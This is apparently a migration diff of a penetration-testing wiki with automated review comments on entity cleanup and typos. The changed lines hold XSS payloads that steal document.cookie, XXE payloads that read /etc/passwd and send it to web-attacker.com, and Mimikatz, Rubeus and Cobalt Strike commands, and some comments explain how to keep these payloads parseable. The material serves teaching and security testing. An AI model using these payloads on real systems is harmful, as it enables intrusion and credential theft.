<figure><img src="../images/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
## References
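Review bot: all three `alt` attributes in this hunk keep a backslash before the ampersand, `desktop\&v=4ZsTKvfP1g0`; that `\&` is a leaked Markdown escape from the GitBook export and renders as a literal backslash in the attribute, so it should go along with the entity. As in the other figure hunks, the URL is not a meaningful alt text for the image.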

View File

@ -225,7 +225,7 @@ while "objetivo" not in response.text:
### Improving Single Packet Attack
In the original research it's explained that this attack has a limit of 1,500 bytes. However, in [**this post**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), it was explained how it's possible to extend the 1,500-byte limitation of the single packet attack to the **65,535 B window limitation of TCP by using IP layer fragmentation** (splitting a single packet into multiple IP packets) and sending them in different order, allowed to prevent reassembling the packet until all the fragments reached the server. This technique allowed the researcher to send 10,000 requests in about 166ms.&#x20;
In the original research it's explained that this attack has a limit of 1,500 bytes. However, in [**this post**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), it was explained how it's possible to extend the 1,500-byte limitation of the single packet attack to the **65,535 B window limitation of TCP by using IP layer fragmentation** (splitting a single packet into multiple IP packets) and sending them in different order, allowed to prevent reassembling the packet until all the fragments reached the server. This technique allowed the researcher to send 10,000 requests in about 166ms.
Note that although this improvement makes the attack more reliable in RC that requiers hundreds/thousands of packets to arrive at the same time, it might also have some software limitations. Some popular HTTP servers like Apache, Nginx and Go have a strict `SETTINGS_MAX_CONCURRENT_STREAMS` setting to 100, 128 and 250. However, other like NodeJS and nghttp2 has it unlimited.\
This basically mean that Apache will only consider 100 HTTP connections from a single TCP connection (limiting this RC attack).
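Review bot: the changed line's clause "sending them in different order, allowed to prevent reassembling the packet until all the fragments reached the server" is ungrammatical; suggest "sending them out of order, which prevents the server from reassembling the packet until every fragment has arrived". The context lines also have "requiers" and "other like NodeJS and nghttp2 has it unlimited" (should be "others ... have it unlimited").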

View File

@ -17,7 +17,7 @@ And, when the page is served, this fragment will be evaluated and replaced with
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution.
You can infer the presence of SSI if the web application uses files with the extension&#x73;**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.
You can infer the presence of SSI if the web application uses files with the extensions**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.
A typical SSI expression has the following format:
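Review bot: after the `&#x73;` to `s` change the line reads "files with the extensions**`.shtml`, `.shtm` or `.stm`**" with no space before the `**`; because that `**` is preceded by a letter and followed by punctuation it is not a left-flanking delimiter run in CommonMark, so the bold will not open and the asterisks render literally. Insert a space: "extensions **`.shtml`, `.shtm` or `.stm`**".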

View File

@ -21,7 +21,7 @@ local all all trust
```
_Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it._\
_&#x4E;ote also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
_Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database.
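Review bot: the `_&#x4E;ote` to `_Note` replacement is correct. Two grammar fixes in the surrounding context would fit the same typo pass: `when the admin forget it` should be `when the admin forgets it`, and `connect to postgresql database` should be `connect to the PostgreSQL database`.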

View File

@ -30,7 +30,7 @@ SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
plpgsql | {admin=U/admin}
```
Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with&#x20;
Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with
```sql
CREATE EXTENSION dblink;
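Review bot: the replaced line now ends mid-sentence (`you could try to create it with`) directly before the `sql` fence; end it with a colon (`... create it with:`) so the sentence reads correctly against the code block that follows.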

View File

@ -82,7 +82,7 @@ You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://g
- **Burp Suite** supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
- The [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** will allow you to manage better Websocket communications in Burp by getting the **history**, setting **interception rules**, using **match and replace** rules, using **Intruder** and **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", this tool, written in Node.js, provides a user interface to **capture, intercept, send custom** messages and view all WebSocket and Socket.IO communications between the client and server.
- [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication.&#x20;
- [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication.
- [**https://websocketking.com/**](https://websocketking.com/) it's a **web to communicate** with other webs using **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) among other types of communications/protocols, it provides a **web to communicate** with other webs using **websockets.**
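Review bot: the trailing-space removal on the wsrepl bullet is fine; the two bullets after it say `a web to communicate with other webs`, which should be `a web app to communicate with other web servers` in both places.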

View File

@ -12,7 +12,7 @@ Let's see how this exploit work:
- The attacker will inject a note with as many **`<img`** tags **loading** **`/js/purify.js`** as possible (more than 6 to block the origin).
- Then, the attacker will **remove** the **note** with index 1.
- Then, the attacker will \[make the **bot access the page** with the reminding note] and will send a **request** to **`victim.com/js/purify.js`** that he will **time**.&#x20;
- Then, the attacker will \[make the **bot access the page** with the reminding note] and will send a **request** to **`victim.com/js/purify.js`** that he will **time**.
- If the time is **bigger**, the **injection** was in the **note** left, if the time is **lower**, the **flag** was in there.
> [!NOTE]
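Review bot: `reminding note` on the replaced line is a typo for `remaining note`, and `\[make the **bot access the page** with the remaining note]` is a leftover GitBook escape (`\[` paired with an unescaped `]`), the same class of migration debris as the `&#x20;` being removed; drop the brackets or escape both sides in this pass.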

View File

@ -15,7 +15,7 @@ The idea behind this exploit is:
- The posts are loaded alphabetically
- An **attacker** can **inject** a **post** starting with **"A"**, then some **HTML tag** (like a big **`<canvas`**) will fulfil most of the **screen** and some final **`<img lazy` tags** to load things.
- If instead of an "A" the **attacker injects the same post but starting with a "z".** The **post** with the **flag** will appear **first**, then the **injected** **post** will appear with the initial "z" and the **big** **canvas**. Because the post with the flag appeared first, the first canvas will occupy all the screen and the final **`<img lazy`** tags injected **won't be seen** in the screen, so they **won't be loaded**.
- Then, **while** the bot is **accessing** the page, the **attacker** will **send fetch requests**.&#x20;
- Then, **while** the bot is **accessing** the page, the **attacker** will **send fetch requests**.
- If the **images** injected in the post are being **loaded**, these **fetch** requests will take **longer**, so the attacker knows that the **post is before the flag** (alphabetically).
- If the the **fetch** requests are **fast**, it means that the **post** is **alphabetically** **after** the flag.
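Review bot: the trailing-space removal is fine; the context lines carry two more typos this pass could take: `will fulfil most of the **screen**` should be `will fill most of the **screen**`, and `If the the **fetch** requests` has a doubled `the`.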

View File

@ -157,7 +157,7 @@ server-side-xss-dynamic-pdf.md
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\***&#x20;\***\*`-->`\*\***&#x20;\***\*or \*\*\*\*\*\***`--!>`\*\*_
_**Note: A HTML comment can be closed using\*\*\*\*\*\***\***\*`-->`\*\***\***\*or \*\*\*\*\*\***`--!>`\*\*_
In this case and if no black/whitelisting is used, you could use payloads like:
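Review bot: the replaced Note line is still broken markup after this change: the run of `\*\*` escapes (`using\*\*\*\*\*\***\***\*`-->`\*\***\***\*or ...`) is the same GitBook migration debris as the `&#x20;` being removed and renders as a string of literal asterisks. Replace the whole line with `_**Note: an HTML comment can be closed using `-->` or `--!>`**_`. In the preceding context, `deleted of if it is` should be `deleted, or if it is`, and `For this cases` should be `For these cases`.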
@ -336,7 +336,7 @@ javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
javascript:alert(1)
java //Note the new line
script:alert(1)
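Review bot: the `&#x6a&#x61&#x76...&#x3aalert(1)` line is not a migration artifact but one of the encoding variants this list exists to enumerate; the neighbouring `javascript&colon;alert(1)`, `javascript&#x003A;alert(1)` and `javascript&#58;alert(1)` lines are kept in entity form for exactly that reason. Decoding it to `javascript:alert(1)` turns it into a duplicate of the plain form and drops the semicolon-less hex-entity case. Revert this line; if the renderer was decoding it, escape the ampersands (`&amp;#x6a...`) or put it in a code span so the entities display literally.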
@ -558,8 +558,8 @@ loop``````````````
```markup
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
```
### Unicode Encode JS execution
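Review bot: same concern as the previous hunk: inside the `markup` fence these lines render literally, so `<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>` and the `srcdoc` line were deliberate examples of an entity-encoded script body (the `alert&lpar;'1'&rpar;` line just above keeps its entities for the same reason), not encoding leftovers; the decoded replacements are plain `alert(1)` and no longer illustrate anything. Revert both. Separately, `neccesary` in the trailing comment should be `necessary`, and that comment is never closed with `-->`.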

View File

@ -48,7 +48,7 @@ t:prompt(document.cookie))
### HTML Sanitiser Markdown Bypass
The following code is **sanitising HTML input** and then **passing it to the markdown parser**, then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify&#x20;
The following code is **sanitising HTML input** and then **passing it to the markdown parser**, then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify
```html
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
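Review bot: `miss-interpretations` on the replaced line should be `misinterpretations`, and the sentence should end with a period instead of running straight into the `html` fence.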
@ -103,10 +103,10 @@ Fuzzing examples from
[a](j a v a s c r i p t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
<javascript:alert('XSS')>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
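Review bot: the two decoded lines, `<javascript:alert('XSS')>` and `[a](javascript:alert('XSS'))`, are no longer distinct fuzzing cases: they duplicate the `<javascript:prompt(document.cookie)>` and `[a](javascript:...)` entries above them, whereas the `&#x6A&#x61...&#x29` forms were the numeric-entity-encoded variants the list is enumerating. Revert both lines (escaping `&` as `&amp;` if the renderer decodes them) so the encoded cases survive the migration.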
@ -143,7 +143,7 @@ _http://danlec_@.1 style=background-image:url(
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
[XSS](javascript:alert('XSS'))
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
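Review bot: as in the earlier fuzzing list, `[XSS](&#x6A&#x61...&#x29)` was the entity-encoded variant, and the decoded `[XSS](javascript:alert('XSS'))` is functionally a duplicate of `[XSS](javascript:prompt(document.cookie))` two lines above; revert this line rather than decoding it.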

View File

@ -115,7 +115,7 @@ The structure is as follows:
```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```
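Review bot: this replacement breaks the payload. In `<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">` the `&#x25;` is an XML character reference that is required, not a migration artifact: a bare `%` inside an entity value starts a parameter-entity reference, and `% exfiltrate` (with the space) is a well-formedness error, so the new `<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM ...">` line will be rejected by the parser. Only `%file;` is meant to be expanded when `eval` is declared. Revert to `&#x25;`.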
@ -178,10 +178,10 @@ Consider a scenario where the server's filesystem contains a DTD file at `/usr/l
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file'>">
%eval;
%error;
'>
%local_dtd;
]>
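Review bot: this hunk rewrites the local-DTD payload into XML that cannot parse, and the original lines were not migration artifacts. Inside the single-quoted `custom_entity` value, `&#x25;` yields a literal `%` after one expansion (a bare `%` would be a parameter-entity reference, which is not allowed inside a declaration in the internal subset), `&#x26;#x25;` yields `&#x25;` after the first expansion and `%` after the second, and `&#x27;` is the only way to place a `'` inside a `'`-delimited value. The replacement `<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file'>">` therefore closes the outer entity value at its first `'`. Revert the four lines. Separately, the original `&#x25;file&#x27;` is missing the `;` of the reference; the `docbookx.dtd` example later on this page writes it `&#x25;file;&#x27;`, which is the correct form.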
@ -200,10 +200,10 @@ The outlined steps are executed by this DTD:
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
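Review bot: same problem as the `schema.dtd` example above: the `&#x25;`, `&#x26;#x25;` and `&#x27;` references inside the single-quoted `ISOamso` value are what keep the nested declarations well-formed at each expansion stage, and the decoded lines terminate the outer `'...'` value at the first apostrophe and introduce bare `%` references that are invalid there. Revert this hunk.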
@ -491,7 +491,7 @@ You can create an **entity inside an entity** encoding it with **html entities**
Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
<env>&exfil;</env>
</data>
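Review bot: decoding only `&#x3C;` to `<` makes this example contradict the sentence above it, which says the nested entity has to be fully numeric-entity encoded; everything after the `<` is still `&#x21;&#x45;...`, so the line is now neither the encoded form the text describes nor a readable plain one. Keep the original `&#x3C;`. The context line above also still carries a mangled link (`\[in this example]\(...)\\](<...>)`) that belongs in the same cleanup.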

View File

@ -8,7 +8,7 @@
### **Partial RELRO**
**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. By **positioning the GOT above the program's variables in memory, Partial RELRO aims to prevent buffer overflows from reaching and corrupting the GOT**.&#x20;
**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. By **positioning the GOT above the program's variables in memory, Partial RELRO aims to prevent buffer overflows from reaching and corrupting the GOT**.
This **doesn't prevent the GOT** to be abused **from arbitrary write** vulnerabilities.
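Review bot: `This **doesn't prevent the GOT** to be abused **from arbitrary write** vulnerabilities` in the trailing context should read `This doesn't prevent the GOT from being overwritten via an arbitrary-write vulnerability`; the replaced line itself is fine.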

View File

@ -107,7 +107,7 @@ log.info(f"The canary is: {canary}")
## Threads
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-force** a canary if the binary spawns a new thread every time an attack happens.&#x20;
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-force** a canary if the binary spawns a new thread every time an attack happens.
A buffer overflow in a threaded function protected with canary can be used to modify the master canary of the process. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).

View File

@ -12,7 +12,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.
**CTF examples:**&#x20;
**CTF examples:**
- [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
- 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`
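Review bot: `and the a ROP gadget to call` in the last context line has a stray `the` and should be `and then a ROP gadget to call`; `the first step is to fill an overflow until the byte 0x00 of the canary` would be clearer as `the first step is to overflow up to the 0x00 byte of the canary`.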

View File

@ -4,7 +4,7 @@
## Basic Information
**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.&#x20;
**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.
When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.

View File

@ -71,7 +71,7 @@ To find the address of the `win` function, you can use **gdb**, **objdump**, or
objdump -d vulnerable | grep win
```
This command will show you the assembly of the `win` function, including its starting address.&#x20;
This command will show you the assembly of the `win` function, including its starting address.
The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed.

View File

@ -55,7 +55,7 @@ Then, you do something so that **value changes**, and you **stop** the game and
![](<../../images/image (684).png>)
Cheat Engine will search for the **values** that **went from 100 to the new value**. Congrats, you **found** the **address** of the value you were looking for, you can now modify it.\
_&#x49;f you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
_If you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
### Unknown Value, known change

View File

@ -23,7 +23,7 @@ Although in exchanges this is usually used to try to make a profit.
### Hedging With Futures <a href="#mntl-sc-block_7-0" id="mntl-sc-block_7-0"></a>
If a fund manager is afraid that some stocks are going to go down he might take a short position over some assets like bitcoins or S\&P 500 futures contracts. This would be similar to buying or having some assets and create a contract of selling those at a future time at a bigger price.&#x20;
If a fund manager is afraid that some stocks are going to go down he might take a short position over some assets like bitcoins or S\&P 500 futures contracts. This would be similar to buying or having some assets and create a contract of selling those at a future time at a bigger price.
In case the price goes down the fund manager will earn benefits because he will sell the assets at a bigger price. If the price of the assets goes up the manager won't earn that benefit but he will still keep his assets.

View File

@ -76,7 +76,7 @@ tensor3d = torch.tensor([[[1, 2], [3, 4]],
### Tensor Data Types
PyTorch tensors can store data of various types, such as integers and floating-point numbers.&#x20;
PyTorch tensors can store data of various types, such as integers and floating-point numbers.
You can check a tensor's data type using the `.dtype` attribute:

View File

@ -81,7 +81,7 @@ Calculating attention weights:
#### Step 3: Compute the Context Vector
> [!TIP]
> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)&#x20;
> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)
The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
@ -174,7 +174,7 @@ To prevent the dot products from becoming too large, scale them by the square ro
> [!TIP]
> The score is divided by the square root of the dimensions because dot products might become very large and this helps to regulate them.
**Apply Softmax to Obtain Attention Weights:** Like in the initial example, normalize all the values so they sum 1.&#x20;
**Apply Softmax to Obtain Attention Weights:** Like in the initial example, normalize all the values so they sum 1.
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
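Review bot: `normalize all the values so they sum 1` on the replaced line should be `so they sum to 1`.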

View File

@ -602,7 +602,7 @@ def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top
> [!NOTE]
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**.
>
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities&#x20;
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities
>
> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**.
>
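Review bot: `This allows to not need to select a number of `k` samples` in the context after the replaced line should be `This removes the need to select a fixed number `k` of samples`; `on each case` should be `in each case`.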

View File

@ -30,7 +30,7 @@ Flipper Zero can only read an UID, SAK, ATQA, and stored data on bank cards **wi
Bank card reading screenFor bank cards, Flipper Zero can only read data **without saving and emulating it**.
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&ixlib=react-9.1.1&h=916&w=2662" alt=""><figcaption></figcaption></figure>
#### Unknown cards <a href="#id-37eo8" id="id-37eo8"></a>
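Review bot: the bare `&` in the `src` attribute is tolerated by HTML5 here only because `&ixlib`, `&h` and `&w` do not match named character references; the original `&#x26;` was valid HTML rather than a typo, and the safe replacement in an attribute value is `&amp;`, not a raw ampersand.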
@ -38,13 +38,13 @@ When Flipper Zero is **unable to determine NFC card's type**, then only an **UID
Unknown card reading screenFor unknown NFC cards, Flipper Zero can emulate only an UID.
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&ixlib=react-9.1.1&h=932&w=2634" alt=""><figcaption></figcaption></figure>
### NFC cards types B, F, and V <a href="#wyg51" id="wyg51"></a>
For **NFC cards types B, F, and V**, Flipper Zero can only **read and display an UID** without saving it.
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&ixlib=react-9.1.1&h=1080&w=2704" alt=""><figcaption></figcaption></figure>
## Actions
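Review bot: same remark as the first `<figure>` hunk in this file: the `&#x26;` occurrences in these two `src` attributes were correct HTML, and if they are rewritten the attribute-safe form is `&amp;`; a raw `&` only happens to work because none of `&ixlib`, `&h`, `&w` is a named reference.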

View File

@ -92,7 +92,7 @@ group3r.exe -f <filepath-name.log>
[**PingCastle**](https://www.pingcastle.com/documentation/) **evaluates the security posture of an AD environment** and provides a nice **report** with graphs.
To run it, can execute the binary `PingCastle.exe` and it will start an **interactive session** presenting a menu of options. The default option to use is **`healthcheck`** which will establish a baseline **overview** of the **domain**, and find **misconfigurations** and **vulnerabilities**.&#x20;
To run it, can execute the binary `PingCastle.exe` and it will start an **interactive session** presenting a menu of options. The default option to use is **`healthcheck`** which will establish a baseline **overview** of the **domain**, and find **misconfigurations** and **vulnerabilities**.
{{#include ../../banners/hacktricks-training.md}}
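Review bot: `To run it, can execute the binary` on the replaced line is missing its subject and should read `To run it, you can execute the binary`.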

View File

@ -127,6 +127,6 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will
## Cracking NTLMv1
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\
_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
{{#include ../../banners/hacktricks-training.md}}

View File

@ -14,14 +14,14 @@ You can **find Computer objects with this attribute** checking if the [userAccou
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
<strong>## ADSearch
</strong>ADSearch.exe --search "(&#x26;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Export tickets with Mimikatz
</strong>privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #Check every 10s for new TGTs</code></pre>
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs</code></pre>
Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\
More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
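Review bot: this hunk decodes `&#x3C;username>` to `<username>` inside a raw HTML `<pre><code>` block (the `</code></pre>` closes on the same line), where the HTML parser treats `<username>` as an unknown element and drops it, so the rendered command becomes `/targetuser: /interval:10`. Inside raw HTML the `&#x3C;` (or `&lt;`) escape is required, and the `&#x26;` in the LDAP filter should become `&amp;`, not a bare `&`. Either keep the entities or convert the block to a fenced Markdown code block, where angle brackets are literal; the stray `<strong>`/`</strong>` tags are GitBook highlight remnants that should go at the same time.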

View File

@ -19,7 +19,7 @@ The beacons of these listeners don't need to talk to the C2 directly, they can c
#### Generate payloads in files
`Attacks -> Packages ->`&#x20;
`Attacks -> Packages ->`
* **`HTMLApplication`** for HTA files
* **`MS Office Macro`** for an office document with a macro
@ -37,7 +37,7 @@ If you already has the file you want to host in a web sever just go to `Attacks
### Beacon Options
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
execute-assembly &#x3C;/path/to/executable.exe>
execute-assembly </path/to/executable.exe>
# Screenshots
